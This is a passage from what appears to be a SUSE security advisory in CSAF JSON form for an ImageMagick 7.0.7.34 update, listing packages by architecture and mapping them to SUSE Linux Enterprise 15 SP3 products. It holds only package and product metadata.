"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.i586",
"product_id": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.i586"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.i586",
"product": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.i586",
"product_id": "perl-PerlMagick-7.0.7.34-150200.10.62.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-doc-7.0.7.34-150200.10.62.1.noarch",
"product": {
"name": "ImageMagick-doc-7.0.7.34-150200.10.62.1.noarch",
"product_id": "ImageMagick-doc-7.0.7.34-150200.10.62.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "ImageMagick-extra-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"product": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"product_id": "perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"product_id": "ImageMagick-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"product_id": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"product_id": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"product_id": "ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.s390x",
"product_id": "ImageMagick-extra-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"product_id": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"product_id": "libMagick++-devel-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"product": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"product_id": "perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "ImageMagick-devel-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "ImageMagick-devel-32bit-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "ImageMagick-extra-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "ImageMagick-extra-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI4-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI4-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI4-32bit-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagick++-devel-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagick++-devel-32bit-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI6-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI6-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI6-32bit-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI6-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI6-32bit-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI6-32bit-7.0.7.34-150200.10.62.1.x86_64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"product": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"product_id": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Enterprise Storage 7.1",
"product": {
"name": "SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:ses:7.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64"
},
